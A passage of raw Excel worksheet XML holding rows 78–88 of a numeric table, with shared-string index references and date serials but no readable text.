        <v>0</v>
      </c>
      <c r="Q78">
        <v>4</v>
      </c>
      <c r="R78">
        <v>0</v>
      </c>
      <c r="S78">
        <v>0</v>
      </c>
      <c r="T78">
        <v>4</v>
      </c>
      <c r="U78">
        <v>476000</v>
      </c>
      <c r="V78">
        <v>0</v>
      </c>
      <c r="W78">
        <v>650</v>
      </c>
      <c r="X78">
        <v>1300</v>
      </c>
      <c r="Y78">
        <v>0</v>
      </c>
      <c r="Z78">
        <v>0</v>
      </c>
      <c r="AA78">
        <v>0</v>
      </c>
      <c r="AB78">
        <v>100</v>
      </c>
      <c r="AC78">
        <v>0</v>
      </c>
      <c r="AD78">
        <v>0</v>
      </c>
      <c r="AE78">
        <v>0</v>
      </c>
      <c r="AF78" t="s">
        <v>738</v>
      </c>
      <c r="AG78">
        <v>59154</v>
      </c>
      <c r="AH78">
        <v>14</v>
      </c>
      <c r="AJ78">
        <v>205</v>
      </c>
      <c r="AK78" t="s">
        <v>739</v>
      </c>
      <c r="AL78" t="s">
        <v>740</v>
      </c>
      <c r="AM78" t="s">
        <v>741</v>
      </c>
      <c r="AN78" t="s">
        <v>82</v>
      </c>
      <c r="AO78">
        <v>1994</v>
      </c>
      <c r="AP78" t="s">
        <v>742</v>
      </c>
      <c r="AQ78" t="s">
        <v>742</v>
      </c>
      <c r="AR78" t="s">
        <v>743</v>
      </c>
      <c r="AS78" t="s">
        <v>71</v>
      </c>
      <c r="AT78" t="s">
        <v>86</v>
      </c>
      <c r="AU78">
        <v>25</v>
      </c>
      <c r="AV78">
        <v>1</v>
      </c>
      <c r="AW78">
        <v>46</v>
      </c>
      <c r="AX78">
        <v>185</v>
      </c>
      <c r="AY78">
        <v>105</v>
      </c>
      <c r="AZ78">
        <v>129</v>
      </c>
      <c r="BA78" t="s">
        <v>16586</v>
      </c>
      <c r="BB78" t="s">
        <v>14878</v>
      </c>
      <c r="BC78">
        <v>0</v>
      </c>
      <c r="BD78" t="s">
        <v>10630</v>
      </c>
    </row>
    <row r="79" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A79">
        <v>367</v>
      </c>
      <c r="B79" t="s">
        <v>744</v>
      </c>
      <c r="C79" t="s">
        <v>74</v>
      </c>
      <c r="D79" t="s">
        <v>745</v>
      </c>
      <c r="E79" t="s">
        <v>412</v>
      </c>
      <c r="F79" t="s">
        <v>746</v>
      </c>
      <c r="G79" s="1">
        <v>44217</v>
      </c>
      <c r="H79">
        <v>2281</v>
      </c>
      <c r="I79">
        <v>2281</v>
      </c>
      <c r="J79">
        <v>2</v>
      </c>
      <c r="K79">
        <v>0</v>
      </c>
      <c r="L79">
        <v>2</v>
      </c>
      <c r="M79">
        <v>4</v>
      </c>
      <c r="N79">
        <v>0</v>
      </c>
      <c r="O79">
        <v>0</v>
      </c>
      <c r="P79">
        <v>0</v>
      </c>
      <c r="Q79">
        <v>5</v>
      </c>
      <c r="R79">
        <v>200</v>
      </c>
      <c r="S79">
        <v>0</v>
      </c>
      <c r="T79">
        <v>0</v>
      </c>
      <c r="U79">
        <v>230</v>
      </c>
      <c r="V79">
        <v>0</v>
      </c>
      <c r="W79">
        <v>10</v>
      </c>
      <c r="X79">
        <v>1</v>
      </c>
      <c r="Y79">
        <v>0</v>
      </c>
      <c r="Z79">
        <v>0</v>
      </c>
      <c r="AA79">
        <v>0</v>
      </c>
      <c r="AB79">
        <v>10</v>
      </c>
      <c r="AC79">
        <v>100</v>
      </c>
      <c r="AD79">
        <v>0</v>
      </c>
      <c r="AE79">
        <v>0</v>
      </c>
      <c r="AF79" t="s">
        <v>747</v>
      </c>
      <c r="AG79">
        <v>59274</v>
      </c>
      <c r="AH79">
        <v>14</v>
      </c>
      <c r="AJ79">
        <v>204</v>
      </c>
      <c r="AK79" t="s">
        <v>748</v>
      </c>
      <c r="AL79" t="s">
        <v>749</v>
      </c>
      <c r="AM79" t="s">
        <v>750</v>
      </c>
      <c r="AN79" t="s">
        <v>55</v>
      </c>
      <c r="AO79">
        <v>2014</v>
      </c>
      <c r="AP79" t="s">
        <v>751</v>
      </c>
      <c r="AQ79" t="s">
        <v>752</v>
      </c>
      <c r="AR79" t="s">
        <v>753</v>
      </c>
      <c r="AS79" t="s">
        <v>71</v>
      </c>
      <c r="AT79" t="s">
        <v>58</v>
      </c>
      <c r="AU79">
        <v>26</v>
      </c>
      <c r="AV79">
        <v>1</v>
      </c>
      <c r="AW79">
        <v>34</v>
      </c>
      <c r="AX79">
        <v>32</v>
      </c>
      <c r="AY79">
        <v>22</v>
      </c>
      <c r="AZ79">
        <v>2</v>
      </c>
      <c r="BA79" t="s">
        <v>16675</v>
      </c>
      <c r="BB79" t="s">
        <v>14516</v>
      </c>
      <c r="BC79">
        <v>0</v>
      </c>
      <c r="BD79" t="s">
        <v>10065</v>
      </c>
    </row>
    <row r="80" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A80">
        <v>640</v>
      </c>
      <c r="B80" t="s">
        <v>754</v>
      </c>
      <c r="C80" t="s">
        <v>157</v>
      </c>
      <c r="D80" t="s">
        <v>755</v>
      </c>
      <c r="E80" t="s">
        <v>142</v>
      </c>
      <c r="F80" t="s">
        <v>756</v>
      </c>
      <c r="G80" s="1">
        <v>43969</v>
      </c>
      <c r="H80">
        <v>2287</v>
      </c>
      <c r="I80">
        <v>2287</v>
      </c>
      <c r="J80">
        <v>1</v>
      </c>
      <c r="K80">
        <v>0</v>
      </c>
      <c r="L80">
        <v>2</v>
      </c>
      <c r="M80">
        <v>2</v>
      </c>
      <c r="N80">
        <v>0</v>
      </c>
      <c r="O80">
        <v>0</v>
      </c>
      <c r="P80">
        <v>0</v>
      </c>
      <c r="Q80">
        <v>0</v>
      </c>
      <c r="R80">
        <v>4</v>
      </c>
      <c r="S80">
        <v>1</v>
      </c>
      <c r="T80">
        <v>1</v>
      </c>
      <c r="U80">
        <v>450</v>
      </c>
      <c r="V80">
        <v>0</v>
      </c>
      <c r="W80">
        <v>10000</v>
      </c>
      <c r="X80">
        <v>864</v>
      </c>
      <c r="Y80">
        <v>0</v>
      </c>
      <c r="Z80">
        <v>0</v>
      </c>
      <c r="AA80">
        <v>0</v>
      </c>
      <c r="AB80">
        <v>0</v>
      </c>
      <c r="AC80">
        <v>5000</v>
      </c>
      <c r="AD80">
        <v>1</v>
      </c>
      <c r="AE80">
        <v>5000</v>
      </c>
      <c r="AF80" t="s">
        <v>757</v>
      </c>
      <c r="AG80">
        <v>61256</v>
      </c>
      <c r="AH80">
        <v>16</v>
      </c>
      <c r="AJ80">
        <v>242</v>
      </c>
      <c r="AK80" t="s">
        <v>758</v>
      </c>
      <c r="AL80" t="s">
        <v>759</v>
      </c>
      <c r="AM80" t="s">
        <v>760</v>
      </c>
      <c r="AN80" t="s">
        <v>55</v>
      </c>
      <c r="AO80">
        <v>2009</v>
      </c>
      <c r="AP80">
        <v>318476662</v>
      </c>
      <c r="AQ80">
        <v>8204046312</v>
      </c>
      <c r="AR80" t="s">
        <v>761</v>
      </c>
      <c r="AS80" t="s">
        <v>71</v>
      </c>
      <c r="AT80" t="s">
        <v>58</v>
      </c>
      <c r="AU80">
        <v>26</v>
      </c>
      <c r="AV80">
        <v>1</v>
      </c>
      <c r="AW80">
        <v>10</v>
      </c>
      <c r="AX80">
        <v>20</v>
      </c>
      <c r="AY80">
        <v>9</v>
      </c>
      <c r="AZ80">
        <v>8</v>
      </c>
      <c r="BA80" t="s">
        <v>16727</v>
      </c>
      <c r="BB80" t="s">
        <v>14743</v>
      </c>
      <c r="BC80" t="s">
        <v>9693</v>
      </c>
      <c r="BD80" t="s">
        <v>10045</v>
      </c>
    </row>
    <row r="81" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A81">
        <v>533</v>
      </c>
      <c r="B81" t="s">
        <v>762</v>
      </c>
      <c r="C81" t="s">
        <v>99</v>
      </c>
      <c r="D81" t="s">
        <v>763</v>
      </c>
      <c r="E81" t="s">
        <v>363</v>
      </c>
      <c r="F81" t="s">
        <v>764</v>
      </c>
      <c r="G81" s="1">
        <v>43955</v>
      </c>
      <c r="H81">
        <v>2294</v>
      </c>
      <c r="I81">
        <v>2294</v>
      </c>
      <c r="J81">
        <v>1</v>
      </c>
      <c r="K81">
        <v>0</v>
      </c>
      <c r="L81">
        <v>0</v>
      </c>
      <c r="M81">
        <v>0</v>
      </c>
      <c r="N81">
        <v>0</v>
      </c>
      <c r="O81">
        <v>0</v>
      </c>
      <c r="P81">
        <v>0</v>
      </c>
      <c r="Q81">
        <v>0</v>
      </c>
      <c r="R81">
        <v>0</v>
      </c>
      <c r="S81">
        <v>0</v>
      </c>
      <c r="T81">
        <v>0</v>
      </c>
      <c r="U81">
        <v>10000</v>
      </c>
      <c r="V81">
        <v>0</v>
      </c>
      <c r="W81">
        <v>0</v>
      </c>
      <c r="X81">
        <v>0</v>
      </c>
      <c r="Y81">
        <v>0</v>
      </c>
      <c r="Z81">
        <v>0</v>
      </c>
      <c r="AA81">
        <v>0</v>
      </c>
      <c r="AB81">
        <v>0</v>
      </c>
      <c r="AC81">
        <v>0</v>
      </c>
      <c r="AD81">
        <v>0</v>
      </c>
      <c r="AE81">
        <v>0</v>
      </c>
      <c r="AF81" t="s">
        <v>765</v>
      </c>
      <c r="AG81">
        <v>11720</v>
      </c>
      <c r="AH81">
        <v>12</v>
      </c>
      <c r="AJ81">
        <v>159</v>
      </c>
      <c r="AK81" t="s">
        <v>405</v>
      </c>
      <c r="AL81" t="s">
        <v>766</v>
      </c>
      <c r="AM81" t="s">
        <v>767</v>
      </c>
      <c r="AN81" t="s">
        <v>68</v>
      </c>
      <c r="AO81">
        <v>2011</v>
      </c>
      <c r="AP81" t="s">
        <v>768</v>
      </c>
      <c r="AQ81" t="s">
        <v>769</v>
      </c>
      <c r="AR81" t="s">
        <v>765</v>
      </c>
      <c r="AS81" t="s">
        <v>71</v>
      </c>
      <c r="AT81" t="s">
        <v>58</v>
      </c>
      <c r="AU81">
        <v>0</v>
      </c>
      <c r="AV81">
        <v>0</v>
      </c>
      <c r="AW81">
        <v>0</v>
      </c>
      <c r="AX81">
        <v>0</v>
      </c>
      <c r="AY81">
        <v>4</v>
      </c>
      <c r="AZ81">
        <v>1</v>
      </c>
      <c r="BA81" t="s">
        <v>17275</v>
      </c>
      <c r="BB81" t="s">
        <v>14651</v>
      </c>
      <c r="BC81">
        <v>0</v>
      </c>
      <c r="BD81" t="s">
        <v>10524</v>
      </c>
    </row>
    <row r="82" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A82">
        <v>371</v>
      </c>
      <c r="B82" t="s">
        <v>770</v>
      </c>
      <c r="C82" t="s">
        <v>99</v>
      </c>
      <c r="D82" t="s">
        <v>771</v>
      </c>
      <c r="E82" t="s">
        <v>142</v>
      </c>
      <c r="F82" t="s">
        <v>772</v>
      </c>
      <c r="G82" s="1">
        <v>43941</v>
      </c>
      <c r="H82">
        <v>2300</v>
      </c>
      <c r="I82">
        <v>2300</v>
      </c>
      <c r="J82">
        <v>1</v>
      </c>
      <c r="K82">
        <v>0</v>
      </c>
      <c r="L82">
        <v>0</v>
      </c>
      <c r="M82">
        <v>0</v>
      </c>
      <c r="N82">
        <v>0</v>
      </c>
      <c r="O82">
        <v>0</v>
      </c>
      <c r="P82">
        <v>0</v>
      </c>
      <c r="Q82">
        <v>0</v>
      </c>
      <c r="R82">
        <v>0</v>
      </c>
      <c r="S82">
        <v>0</v>
      </c>
      <c r="T82">
        <v>0</v>
      </c>
      <c r="U82">
        <v>125000</v>
      </c>
      <c r="V82">
        <v>0</v>
      </c>
      <c r="W82">
        <v>0</v>
      </c>
      <c r="X82">
        <v>0</v>
      </c>
      <c r="Y82">
        <v>0</v>
      </c>
      <c r="Z82">
        <v>0</v>
      </c>
      <c r="AA82">
        <v>0</v>
      </c>
      <c r="AB82">
        <v>0</v>
      </c>
      <c r="AC82">
        <v>0</v>
      </c>
      <c r="AD82">
        <v>0</v>
      </c>
      <c r="AE82">
        <v>0</v>
      </c>
      <c r="AF82" t="s">
        <v>773</v>
      </c>
      <c r="AG82">
        <v>14240</v>
      </c>
      <c r="AH82">
        <v>12</v>
      </c>
      <c r="AI82" t="s">
        <v>774</v>
      </c>
      <c r="AJ82">
        <v>160</v>
      </c>
      <c r="AK82" t="s">
        <v>775</v>
      </c>
      <c r="AL82" t="s">
        <v>776</v>
      </c>
      <c r="AM82" t="s">
        <v>777</v>
      </c>
      <c r="AN82" t="s">
        <v>55</v>
      </c>
      <c r="AO82">
        <v>2009</v>
      </c>
      <c r="AP82">
        <v>2145848040</v>
      </c>
      <c r="AQ82" t="s">
        <v>778</v>
      </c>
      <c r="AR82" t="s">
        <v>779</v>
      </c>
      <c r="AS82" t="s">
        <v>780</v>
      </c>
      <c r="AT82" t="s">
        <v>72</v>
      </c>
      <c r="AU82">
        <v>25</v>
      </c>
      <c r="AV82">
        <v>1</v>
      </c>
      <c r="AW82">
        <v>0</v>
      </c>
      <c r="AX82">
        <v>0</v>
      </c>
      <c r="AY82">
        <v>2</v>
      </c>
      <c r="AZ82">
        <v>0</v>
      </c>
      <c r="BA82" t="s">
        <v>17288</v>
      </c>
      <c r="BB82" t="s">
        <v>14520</v>
      </c>
      <c r="BC82" t="s">
        <v>9550</v>
      </c>
      <c r="BD82">
        <v>0</v>
      </c>
    </row>
    <row r="83" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A83">
        <v>709</v>
      </c>
      <c r="B83" t="s">
        <v>781</v>
      </c>
      <c r="C83" t="s">
        <v>189</v>
      </c>
      <c r="D83" t="s">
        <v>782</v>
      </c>
      <c r="E83" t="s">
        <v>111</v>
      </c>
      <c r="F83" t="s">
        <v>783</v>
      </c>
      <c r="G83" s="1">
        <v>44106</v>
      </c>
      <c r="H83">
        <v>2335</v>
      </c>
      <c r="I83">
        <v>2335</v>
      </c>
      <c r="J83">
        <v>1</v>
      </c>
      <c r="K83">
        <v>1</v>
      </c>
      <c r="L83">
        <v>1</v>
      </c>
      <c r="M83">
        <v>1</v>
      </c>
      <c r="N83">
        <v>0</v>
      </c>
      <c r="O83">
        <v>1</v>
      </c>
      <c r="P83">
        <v>0</v>
      </c>
      <c r="Q83">
        <v>1</v>
      </c>
      <c r="R83">
        <v>1</v>
      </c>
      <c r="S83">
        <v>1</v>
      </c>
      <c r="T83">
        <v>1</v>
      </c>
      <c r="U83">
        <v>150000</v>
      </c>
      <c r="V83">
        <v>1000</v>
      </c>
      <c r="W83">
        <v>3000</v>
      </c>
      <c r="X83">
        <v>2000</v>
      </c>
      <c r="Y83">
        <v>0</v>
      </c>
      <c r="Z83">
        <v>1</v>
      </c>
      <c r="AA83">
        <v>0</v>
      </c>
      <c r="AB83">
        <v>1000</v>
      </c>
      <c r="AC83">
        <v>15000</v>
      </c>
      <c r="AD83">
        <v>1</v>
      </c>
      <c r="AE83">
        <v>1000</v>
      </c>
      <c r="AF83" t="s">
        <v>784</v>
      </c>
      <c r="AG83">
        <v>97126</v>
      </c>
      <c r="AH83">
        <v>31</v>
      </c>
      <c r="AJ83">
        <v>454</v>
      </c>
      <c r="AK83" t="s">
        <v>785</v>
      </c>
      <c r="AL83" t="s">
        <v>786</v>
      </c>
      <c r="AM83" t="s">
        <v>787</v>
      </c>
      <c r="AN83" t="s">
        <v>55</v>
      </c>
      <c r="AO83">
        <v>2016</v>
      </c>
      <c r="AP83">
        <v>81247021062</v>
      </c>
      <c r="AQ83" t="s">
        <v>788</v>
      </c>
      <c r="AR83" t="s">
        <v>784</v>
      </c>
      <c r="AS83" t="s">
        <v>71</v>
      </c>
      <c r="AT83" t="s">
        <v>58</v>
      </c>
      <c r="AU83">
        <v>26</v>
      </c>
      <c r="AV83">
        <v>1</v>
      </c>
      <c r="AW83">
        <v>0</v>
      </c>
      <c r="AX83">
        <v>0</v>
      </c>
      <c r="AY83">
        <v>14</v>
      </c>
      <c r="AZ83">
        <v>16</v>
      </c>
      <c r="BA83" t="s">
        <v>16742</v>
      </c>
      <c r="BB83" t="s">
        <v>14792</v>
      </c>
      <c r="BC83">
        <v>0</v>
      </c>
      <c r="BD83" t="s">
        <v>9679</v>
      </c>
    </row>
    <row r="84" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A84">
        <v>302</v>
      </c>
      <c r="B84" t="s">
        <v>789</v>
      </c>
      <c r="C84" t="s">
        <v>790</v>
      </c>
      <c r="D84" t="s">
        <v>791</v>
      </c>
      <c r="E84" t="s">
        <v>142</v>
      </c>
      <c r="F84" t="s">
        <v>666</v>
      </c>
      <c r="G84" s="1">
        <v>43962</v>
      </c>
      <c r="H84">
        <v>2352</v>
      </c>
      <c r="I84">
        <v>2352</v>
      </c>
      <c r="J84">
        <v>2</v>
      </c>
      <c r="K84">
        <v>0</v>
      </c>
      <c r="L84">
        <v>5</v>
      </c>
      <c r="M84">
        <v>0</v>
      </c>
      <c r="N84">
        <v>0</v>
      </c>
      <c r="O84">
        <v>0</v>
      </c>
      <c r="P84">
        <v>0</v>
      </c>
      <c r="Q84">
        <v>0</v>
      </c>
      <c r="R84">
        <v>0</v>
      </c>
      <c r="S84">
        <v>0</v>
      </c>
      <c r="T84">
        <v>0</v>
      </c>
      <c r="U84">
        <v>500</v>
      </c>
      <c r="V84">
        <v>0</v>
      </c>
      <c r="W84">
        <v>40</v>
      </c>
      <c r="X84">
        <v>0</v>
      </c>
      <c r="Y84">
        <v>0</v>
      </c>
      <c r="Z84">
        <v>0</v>
      </c>
      <c r="AA84">
        <v>0</v>
      </c>
      <c r="AB84">
        <v>0</v>
      </c>
      <c r="AC84">
        <v>0</v>
      </c>
      <c r="AD84">
        <v>0</v>
      </c>
      <c r="AE84">
        <v>0</v>
      </c>
      <c r="AF84" t="s">
        <v>792</v>
      </c>
      <c r="AG84">
        <v>93236</v>
      </c>
      <c r="AH84">
        <v>27</v>
      </c>
      <c r="AJ84">
        <v>438</v>
      </c>
      <c r="AK84" t="s">
        <v>793</v>
      </c>
      <c r="AL84" t="s">
        <v>794</v>
      </c>
      <c r="AM84" t="s">
        <v>795</v>
      </c>
      <c r="AN84" t="s">
        <v>55</v>
      </c>
      <c r="AO84">
        <v>2009</v>
      </c>
      <c r="AP84">
        <v>4013194030</v>
      </c>
      <c r="AQ84" t="s">
        <v>796</v>
      </c>
      <c r="AR84" t="s">
        <v>797</v>
      </c>
      <c r="AS84" t="s">
        <v>71</v>
      </c>
      <c r="AT84" t="s">
        <v>58</v>
      </c>
      <c r="AU84">
        <v>26</v>
      </c>
      <c r="AV84">
        <v>0</v>
      </c>
      <c r="AW84">
        <v>5</v>
      </c>
      <c r="AX84">
        <v>20</v>
      </c>
      <c r="AY84">
        <v>42</v>
      </c>
      <c r="AZ84">
        <v>10</v>
      </c>
      <c r="BA84" t="s">
        <v>16662</v>
      </c>
      <c r="BB84" t="s">
        <v>14467</v>
      </c>
      <c r="BC84" t="s">
        <v>10334</v>
      </c>
      <c r="BD84">
        <v>0</v>
      </c>
    </row>
    <row r="85" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A85">
        <v>237</v>
      </c>
      <c r="B85" t="s">
        <v>798</v>
      </c>
      <c r="C85" t="s">
        <v>157</v>
      </c>
      <c r="D85" t="s">
        <v>799</v>
      </c>
      <c r="E85" t="s">
        <v>142</v>
      </c>
      <c r="F85" t="s">
        <v>800</v>
      </c>
      <c r="G85" s="1">
        <v>44238</v>
      </c>
      <c r="H85">
        <v>2360</v>
      </c>
      <c r="I85">
        <v>2360</v>
      </c>
      <c r="J85">
        <v>2</v>
      </c>
      <c r="K85">
        <v>0</v>
      </c>
      <c r="L85">
        <v>4</v>
      </c>
      <c r="M85">
        <v>8</v>
      </c>
      <c r="N85">
        <v>0</v>
      </c>
      <c r="O85">
        <v>0</v>
      </c>
      <c r="P85">
        <v>0</v>
      </c>
      <c r="Q85">
        <v>2</v>
      </c>
      <c r="R85">
        <v>1</v>
      </c>
      <c r="S85">
        <v>0</v>
      </c>
      <c r="T85">
        <v>0</v>
      </c>
      <c r="U85">
        <v>1200000</v>
      </c>
      <c r="V85">
        <v>0</v>
      </c>
      <c r="W85">
        <v>12000</v>
      </c>
      <c r="X85">
        <v>8000</v>
      </c>
      <c r="Y85">
        <v>0</v>
      </c>
      <c r="Z85">
        <v>0</v>
      </c>
      <c r="AA85">
        <v>0</v>
      </c>
      <c r="AB85">
        <v>1300</v>
      </c>
      <c r="AC85">
        <v>8800</v>
      </c>
      <c r="AD85">
        <v>0</v>
      </c>
      <c r="AE85">
        <v>0</v>
      </c>
      <c r="AF85" t="s">
        <v>801</v>
      </c>
      <c r="AG85">
        <v>62263</v>
      </c>
      <c r="AH85">
        <v>16</v>
      </c>
      <c r="AJ85">
        <v>251</v>
      </c>
      <c r="AK85" t="s">
        <v>802</v>
      </c>
      <c r="AL85" t="s">
        <v>803</v>
      </c>
      <c r="AM85" t="s">
        <v>804</v>
      </c>
      <c r="AN85" t="s">
        <v>55</v>
      </c>
      <c r="AO85">
        <v>2009</v>
      </c>
      <c r="AP85">
        <v>322661888</v>
      </c>
      <c r="AQ85" t="s">
        <v>805</v>
      </c>
      <c r="AR85" t="s">
        <v>806</v>
      </c>
      <c r="AS85" t="s">
        <v>71</v>
      </c>
      <c r="AT85" t="s">
        <v>58</v>
      </c>
      <c r="AU85">
        <v>26</v>
      </c>
      <c r="AV85">
        <v>0</v>
      </c>
      <c r="AW85">
        <v>75</v>
      </c>
      <c r="AX85">
        <v>85</v>
      </c>
      <c r="AY85">
        <v>8</v>
      </c>
      <c r="AZ85">
        <v>16</v>
      </c>
      <c r="BA85" t="s">
        <v>16647</v>
      </c>
      <c r="BB85" t="s">
        <v>14411</v>
      </c>
      <c r="BC85" t="s">
        <v>9738</v>
      </c>
      <c r="BD85" t="s">
        <v>10541</v>
      </c>
    </row>
    <row r="86" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A86">
        <v>163</v>
      </c>
      <c r="B86" t="s">
        <v>807</v>
      </c>
      <c r="C86" t="s">
        <v>74</v>
      </c>
      <c r="D86" t="s">
        <v>808</v>
      </c>
      <c r="E86" t="s">
        <v>809</v>
      </c>
      <c r="F86" t="s">
        <v>810</v>
      </c>
      <c r="G86" s="1">
        <v>43985</v>
      </c>
      <c r="H86">
        <v>2380</v>
      </c>
      <c r="I86">
        <v>2380</v>
      </c>
      <c r="J86">
        <v>4</v>
      </c>
      <c r="K86">
        <v>4</v>
      </c>
      <c r="L86">
        <v>1</v>
      </c>
      <c r="M86">
        <v>0</v>
      </c>
      <c r="N86">
        <v>0</v>
      </c>
      <c r="O86">
        <v>0</v>
      </c>
      <c r="P86">
        <v>0</v>
      </c>
      <c r="Q86">
        <v>1</v>
      </c>
      <c r="R86">
        <v>1</v>
      </c>
      <c r="S86">
        <v>0</v>
      </c>
      <c r="T86">
        <v>3</v>
      </c>
      <c r="U86">
        <v>12000</v>
      </c>
      <c r="V86">
        <v>4</v>
      </c>
      <c r="W86">
        <v>1300</v>
      </c>
      <c r="X86">
        <v>0</v>
      </c>
      <c r="Y86">
        <v>0</v>
      </c>
      <c r="Z86">
        <v>0</v>
      </c>
      <c r="AA86">
        <v>0</v>
      </c>
      <c r="AB86">
        <v>0</v>
      </c>
      <c r="AC86">
        <v>0</v>
      </c>
      <c r="AD86">
        <v>0</v>
      </c>
      <c r="AE86">
        <v>0</v>
      </c>
      <c r="AF86" t="s">
        <v>811</v>
      </c>
      <c r="AG86">
        <v>50153</v>
      </c>
      <c r="AH86">
        <v>14</v>
      </c>
      <c r="AJ86">
        <v>220</v>
      </c>
      <c r="AK86" t="s">
        <v>812</v>
      </c>
      <c r="AL86" t="s">
        <v>813</v>
      </c>
      <c r="AM86" t="s">
        <v>814</v>
      </c>
      <c r="AN86" t="s">
        <v>55</v>
      </c>
      <c r="AO86">
        <v>2012</v>
      </c>
      <c r="AP86">
        <v>248660925</v>
      </c>
      <c r="AQ86" t="s">
        <v>815</v>
      </c>
      <c r="AR86" t="s">
        <v>816</v>
      </c>
      <c r="AS86" t="s">
        <v>71</v>
      </c>
      <c r="AT86" t="s">
        <v>58</v>
      </c>
      <c r="AU86">
        <v>26</v>
      </c>
      <c r="AV86">
        <v>3</v>
      </c>
      <c r="AW86">
        <v>0</v>
      </c>
      <c r="AX86">
        <v>0</v>
      </c>
      <c r="AY86">
        <v>46</v>
      </c>
      <c r="AZ86">
        <v>107</v>
      </c>
      <c r="BA86" t="s">
        <v>17270</v>
      </c>
      <c r="BB86" t="s">
        <v>14285</v>
      </c>
      <c r="BC86">
        <v>0</v>
      </c>
      <c r="BD86" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="87" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A87">
        <v>217</v>
      </c>
      <c r="B87" t="s">
        <v>817</v>
      </c>
      <c r="C87" t="s">
        <v>157</v>
      </c>
      <c r="D87" t="s">
        <v>818</v>
      </c>
      <c r="E87" t="s">
        <v>131</v>
      </c>
      <c r="F87" t="s">
        <v>819</v>
      </c>
      <c r="G87" s="1">
        <v>44081</v>
      </c>
      <c r="H87">
        <v>2411</v>
      </c>
      <c r="I87">
        <v>2411</v>
      </c>
      <c r="J87">
        <v>0</v>
      </c>
      <c r="K87">
        <v>0</v>
      </c>
      <c r="L87">
        <v>0</v>
      </c>
      <c r="M87">
        <v>0</v>
      </c>
      <c r="N87">
        <v>0</v>
      </c>
      <c r="O87">
        <v>0</v>
      </c>
      <c r="P87">
        <v>0</v>
      </c>
      <c r="Q87">
        <v>0</v>
      </c>
      <c r="R87">
        <v>0</v>
      </c>
      <c r="S87">
        <v>0</v>
      </c>
      <c r="T87">
        <v>1</v>
      </c>
      <c r="U87">
        <v>0</v>
      </c>
      <c r="V87">
        <v>0</v>
      </c>
      <c r="W87">
        <v>0</v>
      </c>
      <c r="X87">
        <v>0</v>
      </c>
      <c r="Y87">
        <v>0</v>
      </c>
      <c r="Z87">
        <v>0</v>
      </c>
      <c r="AA87">
        <v>0</v>
      </c>
      <c r="AB87">
        <v>0</v>
      </c>
      <c r="AC87">
        <v>0</v>
      </c>
      <c r="AD87">
        <v>0</v>
      </c>
      <c r="AE87">
        <v>200000</v>
      </c>
      <c r="AF87" t="s">
        <v>820</v>
      </c>
      <c r="AG87">
        <v>68472</v>
      </c>
      <c r="AH87">
        <v>16</v>
      </c>
      <c r="AJ87">
        <v>237</v>
      </c>
      <c r="AK87" t="s">
        <v>377</v>
      </c>
      <c r="AL87" t="s">
        <v>378</v>
      </c>
      <c r="AM87" t="s">
        <v>821</v>
      </c>
      <c r="AN87" t="s">
        <v>55</v>
      </c>
      <c r="AO87">
        <v>1992</v>
      </c>
      <c r="AP87">
        <v>333593325</v>
      </c>
      <c r="AQ87" t="s">
        <v>822</v>
      </c>
      <c r="AR87" t="s">
        <v>823</v>
      </c>
      <c r="AU87">
        <v>6</v>
      </c>
      <c r="AV87">
        <v>1</v>
      </c>
      <c r="AW87">
        <v>6</v>
      </c>
      <c r="AX87">
        <v>0</v>
      </c>
      <c r="AY87">
        <v>1</v>
      </c>
      <c r="AZ87">
        <v>8</v>
      </c>
      <c r="BA87" t="s">
        <v>17281</v>
      </c>
      <c r="BB87" t="s">
        <v>14393</v>
      </c>
      <c r="BC87" t="s">
        <v>10703</v>
      </c>
      <c r="BD87" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="88" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A88">
        <v>538</v>
      </c>
      <c r="B88" t="s">
        <v>824</v>
      </c>
      <c r="C88" t="s">
        <v>129</v>
      </c>
      <c r="D88" t="s">
        <v>825</v>
      </c>
      <c r="E88" t="s">
        <v>826</v>
      </c>
      <c r="F88" t="s">
        <v>827</v>
      </c>
      <c r="G88" s="1">
        <v>44012</v>
      </c>
      <c r="H88">
        <v>2417</v>
      </c>
      <c r="I88">
        <v>2417</v>
      </c>
      <c r="J88">
        <v>0</v>
      </c>
      <c r="K88">
        <v>0</v>
      </c>
      <c r="L88">
        <v>0</v>
      </c>
      <c r="M88">
        <v>0</v>
      </c>
      <c r="N88">
        <v>0</v>
      </c>
      <c r="O88">
        <v>0</v>
      </c>
      <c r="P88">
        <v>0</v>
      </c>
      <c r="Q88">
        <v>0</v>
      </c>
      <c r="R88">
        <v>0</v>
      </c>
      <c r="S88">
        <v>1</v>
      </c>
      <c r="T88">
        <v>1</v>
      </c>
      <c r="U88">
        <v>0</v>
      </c>
      <c r="V88">
        <v>0</v>
      </c>
      <c r="W88">
        <v>0</v>
      </c>
      <c r="X88">
        <v>0</v>
      </c>
      <c r="Y88">
        <v>0</v>
      </c>
      <c r="Z88">
        <v>0</v>
      </c>
      <c r="AA88">
        <v>0</v>
      </c>
      <c r="AB88">
        <v>0</v>
      </c>
      <c r="AC88">
        <v>0</v>
      </c>
      <c r="AD88">
        <v>1</v>
      </c>
      <c r="AE88">
        <v>30000</v>
      </c>
      <c r="AF88" t="s">
        <v>828</v>
      </c>
      <c r="AG88">
        <v>15710</v>
      </c>
      <c r="AH88">
        <v>11</v>
      </c>
      <c r="AJ88">
        <v>270</v>
      </c>
      <c r="AK88" t="s">
        <v>829</v>
      </c>
      <c r="AL88" t="s">
        <v>830</v>
      </c>
      <c r="AM88" t="s">
        <v>831</v>
      </c>
      <c r="AN88" t="s">
        <v>55</v>
      </c>
      <c r="AO88">
        <v>2013</v>
      </c>
      <c r="AP88" t="s">
        <v>832</v>
      </c>
      <c r="AQ88" t="s">
        <v>833</v>
      </c>
      <c r="AR88" t="s">
        <v>834</v>
      </c>
      <c r="AS88" t="s">
        <v>553</v>
      </c>
      <c r="AT88" t="s">
        <v>58</v>
      </c>
      <c r="AU88">
        <v>6</v>
      </c>
      <c r="AV88">
        <v>1</v>
      </c>
      <c r="AW88">
